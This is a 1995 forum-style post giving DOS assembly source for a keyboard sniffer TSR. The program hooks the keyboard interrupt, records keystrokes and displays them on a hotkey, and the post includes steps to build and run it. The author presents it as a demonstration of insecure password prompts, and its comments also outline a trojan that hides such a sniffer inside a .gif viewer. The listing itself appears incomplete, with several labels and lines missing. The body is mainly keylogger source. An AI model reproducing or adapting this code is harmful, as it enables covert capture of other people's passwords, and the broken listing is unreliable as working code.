keyboard sniffer TSR source code...

Wed Jan 11 23:02:56 PST 1995

For Dos operating systems.

I wrote this in a weekend, and no longer wish to work with it.  

I will release it as not ask for support, and if you know 
where I work, they have no idea I am doing this, so don't make
any assumptions about my company's software.

But, here it is, the source code for a keyboard sniffer program.

After you assemble it, link it, turn it into a .com file, and 
execute it, just hit <alt> page up for a display of the first
half of the buffer, and <alt> page down for a display of the
second half of the buffer.

Then, test it out with pgp or other dos based programs that ask
you for a password (use a fake one), and you will probably see
how insecure most of these programs are.

-----cut here----
; Keyboard sniffer TSR
; asm kbs.asm
; link kbs.obj
; exe2bin kbs kbs.exe
;Notes:  This is a keyboard sniffer program.  It is intended to
;        show how easy it is to make your computer insecure.
; This program hooks itself to the keyboard interrupt routine.
; It is not difficult to imagine a routine that simply replaced
; the keyboard interrupt routine, or simply monitored the
; keyboard buffer and pointers from another interrupt routine,
; e.g., the timer interrupt.
; It is also not a stretch of the imagination to say that it is
; possible that a program that monitors the keyboard buffer and
; display area for things that look like passwords (e.g., look
; for certain prompts, store next 500 characters) to either an
; unused area of the disk, or a hidden file, already exists.
;  That is to say, the FBI, for example, could have already
; hired some programmers to come up with a .gif viewer that
; also attaches a keyboard sniffer to your system snooping
; for passwords, in the hopes that if and when the find a
; suspected (fill-in-the-blank) "crimminal", all they have
; to do is find the secret file created with their trojan TSR.
KB_INT_NUM        EQU     9     ;keyboard interrupt
BUFFER_SIZE       EQU     0b94H  ;our buffer size, 19 lines 2 buffers
TLC             EQU     0C9H    ;top left corner
HL              EQU     0CDH    ;horizontal line
TRC             EQU     0BBH    ;top right corner
VL              EQU     0BAH    ;vertical line
BLC             EQU     0C8H    ;bottom left corner
BRC             EQU     0BCH    ;bottom right corner
LCT             EQU     0CCH    ;left center tap
RCT             EQU     0B9H    ;right center tap
ALTPGUP         EQU     9900H
ALTPGDN         EQU     0A100H
ROM_BIOS_DATA   SEGMENT AT 40H                  ;bios statuses and kb buffer
        ORG             1AH                     ;absolute
        KB_HEAD         DW      ?               ;head of kb buffer
        KB_TAIL         DW      ?               ;tail of kb buffer
        KB_BUFFER       DW      16 DUP (?)      ;The keyboard buffer
        ORG     100H                          ; .com file
; data area...
        buffer  db      BUFFER_SIZE dup ('*')
        head    dw      5
        tail    dw      5
        cnt     dw      ?
        ind     dw      ?
        show_buff       dw      0
        lkb_tail        dw      0       ;last key board til
                                        ;this is for programs that leave
                                        ;the character in bios buffer
                                        ;past one interrupt, e.g., pgp
        OLD_KB_INTERRUPT_ADDR      DD      ?
        row     db      ?
        idstring        db      "0x5fcf9eb78a01ef28"   ;18 long
        PUSH    AX
        PUSH    BX
        PUSH    CX
        PUSH    DX
        PUSH    DI
        PUSH    SI
        PUSH    DS
        PUSH    ES
        MOV     BX,ROM_BIOS_DATA
        MOV     DS,BX           ; point ds to ROM_BIOS_AREA...
        MOV     BX,KB_TAIL
        CMP     BX,KB_HEAD
        JE      nogo1           ;origianal keyboard interrupt has deleted char
        jmp     short go1
        mov     cx,bx
nogo1:  jmp     kbexit2    ;too far for je...
go1:    ;check to see if we already processed this character
        mov     cx,bx
        mov     bx,cs
        mov     ds,bx
        cmp     cx,lkb_tail ;is it the same as last time?
        jne     go3  ;no
        MOV     BX,ROM_BIOS_DATA
        mov     ds,bx
        jmp     kbexit2
        mov     lkb_tail,cx     ;save new tail
        MOV     BX,ROM_BIOS_DATA
        mov     ds,bx
        mov     bx,cx
        SUB     BX,2
        CMP     BX,OFFSET KB_BUFFER     ;did we wrap around?
        JAE     NO_WRAP                 ;no
        MOV     BX,OFFSET KB_BUFFER_END ;yes
        SUB     BX,2
NO_WRAP:MOV     DX,[BX] ;        char in DX now...
        CMP     DX,ALTPGUP      ;altpgup hit?
        jne     checknext1      ;no
        jmp     short   go2     ;yes, display first half of buffer
checknext1: CMP DX,ALTPGDN      ;altpgdn hit?
        jne     nogo2           ;no
        mov     kb_tail,bx      ;delete alt pgdn from kb_buffer
assume ds:code_seg
        mov     cx,bx
        mov     bx,cs
        mov     ds,bx
        xor     bx,bx           ;garbage last tail
        mov     lkb_tail,bx
        mov     bx,offset buffer;yes, display second half of buffer
        add     bx,BUFFER_SIZE/2
        mov     show_buff,bx
        call    dump_buffer     ;dump second half
        jmp     kbexit1
nogo2:  jmp     save_key        ;too far for jne..
assume ds:rom_bios_data
        mov     cx,bx
        mov     bx,rom_bios_data
        mov     ds,bx
        mov     bx,cx
        mov     kb_tail,bx      ;delete '<alt> pgup' from kb_buffer
assume ds:code_seg
        mov     cx,bx
        mov     bx,cs
        mov     ds,bx
        xor     bx,bx           ;garbage last tail
        mov     lkb_tail,bx
        mov     bx,offset buffer        ;first half buffer
        mov     show_buff,bx
        call    dump_buffer     ;dump first half
        jmp     kbexit1
        MOV     BX,CS
        MOV     DS,BX
        mov     bx,offset buffer
        add     bx,head
        mov     [bx],dl ;dh?
        inc     bx
        mov     cx,offset buffer
        add     cx,BUFFER_SIZE
        cmp     bx,cx           ; at end of buffer?
        jz      wrap_it         ; yes
        sub     bx,offset buffer
        mov     head,bx
        jmp     kbexit1
wrap_it:        xor bx,bx
        mov     head,bx
        jmp     kbexit1
        MOV     BX,ROM_BIOS_DATA
        MOV     DS,BX
kbexit2:        POP     ES
        POP     DS
        POP     SI
        POP     DI
        POP     DX
        POP     CX
        POP     BX
        POP     AX
dump_buffer     PROC    NEAR
        MOV     BX,CS
        MOV     DS,BX
        jmp     over_data
        sl1     db      "                           Keyboard Sniffer Program                           ",0
        sl2     db      " Short Circuit, Inc.                  Version:  0.72 (Beta), (C)opyright 1995 ",0
over_data:      mov     dh,0    ;row
        mov     dl,0    ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
        mov     bh,0    ;page
        mov     cx,1    ;count?
        mov     al,TLC  ;top left corner
        mov     ah,0ah  ;service
        int     10h
        mov     dh,0    ;row
        mov     dl,4fh  ;column = 79 dec
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
        mov     bh,0    ;page
        mov     cx,1    ;count?
        mov     al,TRC  ;top right corner
        mov     ah,0ah  ;service
        int     10h
        mov     dh,17h  ;row
        mov     dl,0    ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
        mov     bh,0    ;page
        mov     cx,1    ;count?
        mov     al,BLC  ;bottom left corner
        mov     ah,0ah  ;service
        int     10h
        mov     dh,17h  ;row
        mov     dl,4fh  ;column=79 dec
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
        mov     bh,0    ;page
        mov     cx,1    ;count?
        mov     al,BRC  ;bottom right corner
        mov     ah,0ah  ;service
        int     10h
        mov     cx,4eh  ;78 dec
        mov     dh,0    ;row
        mov     dl,1    ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
        mov     bh,0    ;page
        mov     cx,4eh  ; 78 characters
        mov     al,HL   ;horizontal line
        mov     ah,0ah  ;service
        int     10h     ;put char
        mov     dh,3    ;row
        mov     dl,1    ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
        mov     bh,0    ;page
        mov     cx,4eh  ; 78 characters
        mov     al,HL   ;horizontal line
        mov     ah,0ah  ;service
        int     10h     ;put char
        mov     dh,17h  ;row
        mov     dl,1
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
        mov     bh,0    ;page
        mov     cx,4eh  ;count
        mov     al,HL   ;horizontal line
        mov     ah,0ah  ;service
        int     10h     ;put char
        mov     cx,16h  ;22 lines
dline:  mov     dh,cl   ;row
        mov     dl,0    ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
        mov     dx,cx   ;save cx
        mov     bh,0    ;page
        mov     cx,1    ;count
        mov     al,VL   ;vertical line
        mov     ah,0ah  ;service
        int     10h
        mov     cx,dx   ;restore cx
        mov     dh,cl   ;row
        mov     dl,4fh  ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
        mov     dx,cx   ;save cx
        mov     bh,0    ;page
        mov     cx,1    ;count
        mov     al,VL   ;vertical line
        mov     ah,0ah  ;service
        int     10h
        mov     cx,dx   ;restore cx
        loop    dline
        mov     dh, 3h  ;row
        mov     dl, 0
        mov     bh, 0   ;page
        mov     ah, 2   ;service
        int     10h     ;set cursor position
        mov     bh, 0   ;page
        mov     cx, 1   ;count
        mov     al,LCT  ;horizontal line
        mov     ah,0ah  ;service
        int     10h     ;put char
        mov     dh, 3h  ;row
        mov     dl, 4fh ;column
        mov     bh, 0   ;page
        mov     ah, 2   ;service
        int     10h     ;set cursor position
        mov     bh, 0   ;page
        mov     cx, 1   ;count
        mov     al,RCT  ;horizontal line
        mov     ah,0ah  ;service
        int     10h     ;put char
        mov     cx, BUFFER_SIZE/2 -1 ;going backwards...
        mov     ind, cx
        mov     cl, 13h
dorows: mov     row, cl
        mov     cx, 4eh
ll0:    mov     cnt, cx
        mov     dl, cl  ;to end of line
        ;inc     dl     ;cnt was 1 too small
        mov     dh,row
        inc     dh
        inc     dh
        inc     dh
        mov     ah,2            ;set cursor position
        mov     bh,0            ;page 0
        int     10h             ;move to 0,0
        mov     bx,show_buff    ;show_buff points to correct half...
        add     bx,ind          ;ind must have index, *(show_buff + ind)
        mov     al,[bx]
        mov     bh,0
        mov     cx,1
        mov     ah,0ah
        int     10h
        dec     ind             ;decrement index
        mov     cx,cnt
        loop ll0
        mov     cl,row
        dec     cl
        jnz     dorows
        mov     dh,1
        mov     dl,1
        mov     bx,offset sl1
        call    print_string
        mov     dh,2
        mov     dl,1
        mov     bx,offset sl2
        call    print_string
        mov     dh,18h
        mov     dl,4
        mov     bh,0
        mov     ah,2
        int     10h     ;move back to correct position
dump_buffer     ENDP
print_string    PROC    NEAR
        ;assumes ds==cs
        ;null terminated string, address in bx...
        ;row in dh
        ;col in dl
        ;uses bios int 10h, safe for tsr programs...
        jmp     over_local_ps
        sadd    dw      ?
        mov     sadd,bx
np:     mov     bh,0
        mov     ah,2
        int     10h
        mov     bx,sadd
        mov     al,[bx]
        cmp     al,0    ;is it 0?
        je      pse     ;yes, return
        inc     bx
        mov     sadd,bx
        inc     dl
        mov     bh,0
        mov     cx,1
        mov     ah,0ah
        int     10h
        jmp     np      ;next print (next character)
pse:    ret             ;done, encountered 0
print_string    ENDP
; Anything before this point stays in memory if it's okay to install...
; tests to see if kbs is already installed, returns
; zf=1 if it was already installed.
; zf=0 if it has not been previously installed.
kbia      PROC    NEAR
	;assumes ds points to code segment...
	MOV	AH, 35H 		;put old vector into es:bx
	INT	21H
        mov     si,offset idstring      ;ds:si points to our string
        mov     di,bx
        sub     di, 12h                 ;es:di points to other string?
        mov     cx,12h
        REPE    cmpsb
kbia endp
                mov     bx,cs
                mov     ds,bx
                xor     bx,bx
                mov     head,bx
                mov     tail,bx
                jmp     over_temp_data
                instg           db      "Kbs installed.",0dh,0ah,"$"
                notinstg        db      "Kbs already installed.",0dh,0ah,"$"
over_temp_data: call    kbia
                je      dont_install_it
                jmp     install_it
                mov     dx,offset notinstg
                mov     ah,09h
                int     21h
                mov     bx,cs
                mov     es,bx
                int     20h
install_it:     MOV     AH, 35H                 ;put old vector into es:bx
                MOV     AL,KB_INT_NUM
                INT     21H
                MOV     OLD_KB_INTERRUPT,BX
                MOV     OLD_KB_INTERRUPT[2],ES
                MOV     AH,25H                  ;set new keyboard interrupt
                LEA     DX,KBINTERRUPT
                INT     21H
                mov     dx,offset instg
                mov     ah,09h
                int     21h
        MOV     BX,ROM_BIOS_DATA
        MOV     DS,BX
        mov     cx,KB_TAIL
        MOV     BX,CS
        MOV     DS,BX
        mov     lkb_tail,cx
        MOV     DX, offset kbia         ;ds:dx end of stay resident
        INT     27H                     ;allocate and stay resident
        END     FIRST
; P.S.  I haven't programmed in asm in a long time, no fair flaming
;me for poor programming style/ineffecient code.
; Use this code at your own rish.

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